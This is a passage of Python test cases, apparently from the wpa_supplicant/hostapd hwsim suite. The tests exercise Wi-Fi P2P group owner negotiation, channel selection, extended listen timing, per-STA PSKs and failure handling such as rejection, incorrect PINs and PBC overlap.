logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res, i_freq, provdisc))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
# Allow some time for the GO Neg Resp to go out before initializing new
# GO Negotiation.
time.sleep(0.2)
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, timeout=20, freq=r_freq)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init_pbc thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pbc_authorized(i_dev, r_dev, i_intent=None, r_intent=None,
expect_failure=False, i_freq=None, r_freq=None):
i_dev.p2p_listen()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc", timeout=20,
go_intent=i_intent,
expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if expect_failure:
return
logger.info("Group formed")
return [i_res, r_res]
def remove_group(dev1, dev2):
dev1.remove_group()
try:
dev2.remove_group()
except:
pass
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
try:
dev[0].global_request("SET p2p_group_idle 2")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[1].remove_group()
ev = dev[0].wait_global_event(["P2P-GROUP-REMOVED"], timeout=10)
if ev is None:
raise Exception("GO did not remove group on idle timeout")
if "GO reason=IDLE" not in ev:
raise Exception("Unexpected group removal event: " + ev)
finally:
dev[0].global_request("SET p2p_group_idle 0")
def test_grpform_a(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (init: group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_b(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (resp: group iface)"""
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_c(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
def test_grpform2_c(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO) (group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
def test_grpform3_c(dev):
"""P2P group formation using PIN and re-init GO Negotiation (group iface)"""
dev[0].global_request("SET p2p_no_group_iface 0")
dev[1].global_request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform4(dev):
"""P2P group formation response during p2p_find"""
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
dev[0].discover_peer(addr1)
dev[1].p2p_find(social=True)
time.sleep(0.4)
dev[0].global_request("P2P_CONNECT " + addr1 + " 12345670 display")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation RX timed out")
time.sleep(0.5)
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
remove_group(dev[0], dev[1])
def test_grpform_pd(dev):
"""P2P group formation with PD-before-GO-Neg workaround"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
def test_grpform_ext_listen(dev):
"""P2P group formation with extended listen timing enabled"""
addr0 = dev[0].p2p_dev_addr()
try:
if "FAIL" not in dev[0].global_request("P2P_EXT_LISTEN 100"):
raise Exception("Invalid P2P_EXT_LISTEN accepted")
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN 300 1000"):
raise Exception("Failed to set extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN 200 40000"):
raise Exception("Failed to set extended listen timing")
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1],
r_listen=True, i_freq="2417", r_freq="2417",
i_intent=1, r_intent=15)
check_grpform_results(i_res, r_res)
peer1 = dev[0].get_peer(dev[1].p2p_dev_addr())
if peer1['ext_listen_interval'] != "40000":
raise Exception("Extended listen interval not discovered correctly")
if peer1['ext_listen_period'] != "200":
raise Exception("Extended listen period not discovered correctly")
peer0 = dev[1].get_peer(dev[0].p2p_dev_addr())
if peer0['ext_listen_interval'] != "1000":
raise Exception("Extended listen interval not discovered correctly")
if peer0['ext_listen_period'] != "300":
raise Exception("Extended listen period not discovered correctly")
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer during ext listen")
remove_group(dev[0], dev[1])
finally:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
def test_grpform_ext_listen_oper(dev):
"""P2P extended listen timing operations"""
try:
_test_grpform_ext_listen_oper(dev)
finally:
dev[0].global_request("P2P_EXT_LISTEN")
def _test_grpform_ext_listen_oper(dev):
addr0 = dev[0].p2p_dev_addr()
dev[0].global_request("SET p2p_no_group_iface 0")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
addr1 = wpas.p2p_dev_addr()
wpas.request("P2P_SET listen_channel 1")
wpas.global_request("SET p2p_no_group_iface 0")
wpas.request("P2P_LISTEN")
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].request("P2P_LISTEN")
if not wpas.discover_peer(addr0):
raise Exception("Could not discover peer (2)")
dev[0].global_request("P2P_EXT_LISTEN 300 500")
dev[0].global_request("P2P_CONNECT " + addr1 + " 12345670 display auth go_intent=0 freq=2417")
wpas.global_request("P2P_CONNECT " + addr0 + " 12345670 enter go_intent=15 freq=2417")
ev = dev[0].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation failed")
ifaces = wpas.request("INTERFACES").splitlines()
iface = ifaces[0] if "p2p-wlan" in ifaces[0] else ifaces[1]
wpas.group_ifname = iface
if "OK" not in wpas.group_request("STOP_AP"):
raise Exception("STOP_AP failed")
wpas.group_request("SET ext_mgmt_frame_handling 1")
dev[1].p2p_find(social=True)
time.sleep(1)
if dev[1].peer_known(addr0):
raise Exception("Unexpected peer discovery")
ifaces = dev[0].request("INTERFACES").splitlines()
iface = ifaces[0] if "p2p-wlan" in ifaces[0] else ifaces[1]
if "OK" not in dev[0].global_request("P2P_GROUP_REMOVE " + iface):
raise Exception("Failed to request group removal")
wpas.remove_group()
count = 0
timeout = 15
found = False
while count < timeout * 4:
time.sleep(0.25)
count = count + 1
if dev[1].peer_known(addr0):
found = True
break
dev[1].p2p_stop_find()
if not found:
raise Exception("Could not discover peer that was supposed to use extended listen")
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
def test_go_neg_pbc_vs_pin(dev):
"""P2P GO Negotiation with one device using PBC and the other PIN"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_go_neg_pin_vs_pbc(dev):
"""P2P GO Negotiation with one device using PIN and the other PBC"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_grpform_per_sta_psk(dev):
"""P2P group formation with per-STA PSKs"""
dev[0].global_request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
pin = dev[2].wps_read_pin()
dev[0].p2p_go_authorize_client(pin)
c_res = dev[2].p2p_connect_group(dev[0].p2p_dev_addr(), pin, timeout=60)
check_grpform_results(i_res, c_res)
if r_res['psk'] == c_res['psk']:
raise Exception("Same PSK assigned for both clients")
hwsim_utils.test_connectivity_p2p(dev[1], dev[2])
dev[0].remove_group()
dev[1].wait_go_ending_session()
dev[2].wait_go_ending_session()
def test_grpform_per_sta_psk_wps(dev):
"""P2P group formation with per-STA PSKs with non-P2P WPS STA"""
dev[0].global_request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[0].p2p_go_authorize_client_pbc()
dev[2].request("WPS_PBC")
dev[2].wait_connected(timeout=30)
hwsim_utils.test_connectivity_p2p_sta(dev[1], dev[2])
dev[0].remove_group()
dev[2].request("DISCONNECT")
dev[1].wait_go_ending_session()
def test_grpform_force_chan_go(dev):
"""P2P group formation forced channel selection by GO"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
i_freq=2432,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2432":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_cli(dev):
"""P2P group formation forced channel selection by client"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2417,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2417":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_conflict(dev):
"""P2P group formation fails due to forced channel mismatch"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15, r_freq=2427,
expect_failure=True, i_go_neg_status=7)
def test_grpform_pref_chan_go(dev):
"""P2P group formation preferred channel selection by GO"""
dev[0].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2442":
raise Exception("Unexpected channel - did not follow GO's p2p_pref_chan")
remove_group(dev[0], dev[1])
def test_grpform_pref_chan_go_overridden(dev):
"""P2P group formation preferred channel selection by GO overridden by client"""
dev[1].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2422,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2422":
raise Exception("Unexpected channel - did not follow client's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_forcing_chan(dev):
"""P2P group formation with no-GO freq forcing channel"""
dev[1].request("SET p2p_no_go_freq 100-200,300,4000-6000")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow no-GO freq")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_conflict(dev):
"""P2P group formation fails due to no-GO range forced by client"""
dev[1].request("SET p2p_no_go_freq 2000-3000")
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15,
expect_failure=True, i_go_neg_status=7)
def test_grpform_no_5ghz_world_roaming(dev):
"""P2P group formation with world roaming regulatory"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=14,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli2(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=14,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli3(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli4(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse; intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_incorrect_pin(dev):
"""P2P GO Negotiation with incorrect PIN"""
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer not found")
res = dev[1].global_request("P2P_CONNECT " + dev[0].p2p_dev_addr() + " pin auth go_intent=0")
if "FAIL" in res:
raise Exception("P2P_CONNECT failed to generate PIN")
logger.info("PIN from P2P_CONNECT: " + res)
dev[0].global_request("P2P_CONNECT " + addr1 + " 00000000 enter go_intent=15")
ev = dev[0].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation did not complete successfully(0)")
ev = dev[1].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation did not complete successfully(1)")
ev = dev[1].wait_global_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS failure not reported(1)")
if "msg=8 config_error=18" not in ev:
raise Exception("Unexpected WPS failure(1): " + ev)
ev = dev[0].wait_global_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS failure not reported")
if "msg=8 config_error=18" not in ev:
raise Exception("Unexpected WPS failure: " + ev)
ev = dev[1].wait_global_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=10)
if ev is None:
raise Exception("Group formation failure timed out")
ev = dev[0].wait_global_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=5)
if ev is None:
raise Exception("Group formation failure timed out")
def test_grpform_reject(dev):
"""User rejecting group formation attempt by a P2P peer"""
addr0 = dev[0].p2p_dev_addr()
dev[0].p2p_listen()
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
if "OK" in dev[0].global_request("P2P_REJECT foo"):
raise Exception("Invalid P2P_REJECT accepted")
if "FAIL" in dev[0].global_request("P2P_REJECT " + ev.split(' ')[1]):
raise Exception("P2P_REJECT failed")
dev[1].request("P2P_STOP_FIND")
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[1].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=11" not in ev:
raise Exception("Unexpected status code in rejection")
def test_grpform_pd_no_probe_resp(dev):
"""GO Negotiation after PD, but no Probe Response"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Peer not found")
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from Probe Request")
time.sleep(0.3)
dev[0].request("P2P_FLUSH")
dev[0].p2p_listen()
dev[1].global_request("P2P_PROV_DISC " + addr0 + " display")
ev = dev[0].wait_global_event(["P2P-PROV-DISC-SHOW-PIN"], timeout=5)
if ev is None:
raise Exception("PD Request timed out")
ev = dev[1].wait_global_event(["P2P-PROV-DISC-ENTER-PIN"], timeout=5)
if ev is None:
raise Exception("PD Response timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] != '0':
raise Exception("Peer listen frequency learned unexpectedly from PD Request")
pin = dev[0].wps_read_pin()
if "FAIL" in dev[1].global_request("P2P_CONNECT " + addr0 + " " + pin + " enter"):
raise Exception("P2P_CONNECT on initiator failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("GO Negotiation start timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from PD followed by GO Neg Req")
if "FAIL" in dev[0].global_request("P2P_CONNECT " + addr1 + " " + pin + " display"):
raise Exception("P2P_CONNECT on responder failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
def test_go_neg_two_peers(dev):
"""P2P GO Negotiation rejected due to already started negotiation with another peer"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[1].p2p_listen()
dev[2].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
if not dev[0].discover_peer(addr2):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr2 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
dev[0].p2p_listen()
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("timeout on GO Neg RX event")
dev[2].request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[2].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=5" not in ev:
raise Exception("Unexpected status code in rejection: " + ev)
def clear_pbc_overlap(dev, ifname):
hapd_global = hostapd.HostapdGlobal()
hapd_global.remove(ifname)
dev[0].request("P2P_CANCEL")
dev[1].request("P2P_CANCEL")
dev[0].p2p_stop_find()
dev[1].p2p_stop_find()
dev[0].dump_monitor()
dev[1].dump_monitor()
time.sleep(0.1)
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
time.sleep(0.1)
def test_grpform_pbc_overlap(dev, apdev):
"""P2P group formation during PBC overlap"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
time.sleep(0.1)
# Since P2P Client scan case is now optimzied to use a specific SSID, the
# WPS AP will not reply to that and the scan after GO Negotiation can quite
# likely miss the AP due to dwell time being short enoguh to miss the Beacon
# frame. This has made the test case somewhat pointless, but keep it here
# for now with an additional scan to confirm that PBC detection works if
# there is a BSS entry for a overlapping AP.
for i in range(0, 5):
dev[0].scan(freq="2412")
if dev[0].get_bss(apdev[0]['bssid']) is not None:
break
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].global_request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].global_request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_pbc_overlap_group_iface(dev, apdev):
"""P2P group formation during PBC overlap using group interfaces"""
# Note: Need to include P2P IE from the AP to get the P2P interface BSS
# update use this information.
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1",
"beacon_int": "15", 'manage_p2p': '1' }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_stop_find()
dev[0].scan(freq="2412")
dev[0].p2p_listen()
if "OK" not in dev[0].global_request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].global_request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED",
"P2P-GROUP-FORMATION-SUCCESS"], timeout=15)
if ev is None or "WPS-OVERLAP-DETECTED" not in ev:
# Do not report this as failure since the P2P group formation case
# using a separate group interface has limited chances of "seeing" the
# overlapping AP due to a per-SSID scan and no prior scan operations on
# the group interface.
logger.info("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_goneg_fail_with_group_iface(dev):
"""P2P group formation fails while using group interface"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].p2p_listen()
peer = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(peer):
raise Exception("Peer " + peer + " not found")
if "OK" not in dev[1].request("P2P_REJECT " + dev[0].p2p_dev_addr()):
raise Exception("P2P_REJECT failed")
if "OK" not in dev[0].request("P2P_CONNECT " + peer + " pbc"):
raise Exception("P2P_CONNECT failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
def test_grpform_cred_ready_timeout(dev, apdev, params):
"""P2P GO Negotiation wait for credentials to become ready [long]"""
if not params['long']:
raise HwsimSkip("Skip test case with long duration due to --long not specified")
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
if not dev[2].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found(2)")
start = os.times()[4]
cmd = "P2P_CONNECT " + addr1 + " 12345670 display"
if "OK" not in dev[0].global_request(cmd):
raise Exception("Failed to initiate GO Neg")
if "OK" not in dev[2].global_request(cmd):
raise Exception("Failed to initiate GO Neg(2)")
# First, check with p2p_find
ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=30)
if ev is not None:
raise Exception("Too early GO Negotiation timeout reported(2)")
dev[2].dump_monitor()
logger.info("Starting p2p_find to change state")
dev[2].p2p_find()
ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=100)
if ev is None:
raise Exception("GO Negotiation failure timed out(2)")
dev[2].dump_monitor()
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds(2)".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time(2): {}".format(end - start))
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
wpas.p2p_listen()
ev = dev[2].wait_global_event(["P2P-DEVICE-FOUND"], timeout=10)
if ev is None:
raise Exception("Did not discover new device after GO Negotiation failure")
if wpas.p2p_dev_addr() not in ev:
raise Exception("Unexpected device found: " + ev)
dev[2].p2p_stop_find()
wpas.p2p_stop_find()
# Finally, verify without p2p_find
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=120)
if ev is None:
raise Exception("GO Negotiation failure timed out")
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time: {}".format(end - start))
def test_grpform_no_wsc_done(dev):
"""P2P group formation with WSC-Done not sent"""
addr0 = dev[0].p2p_dev_addr()
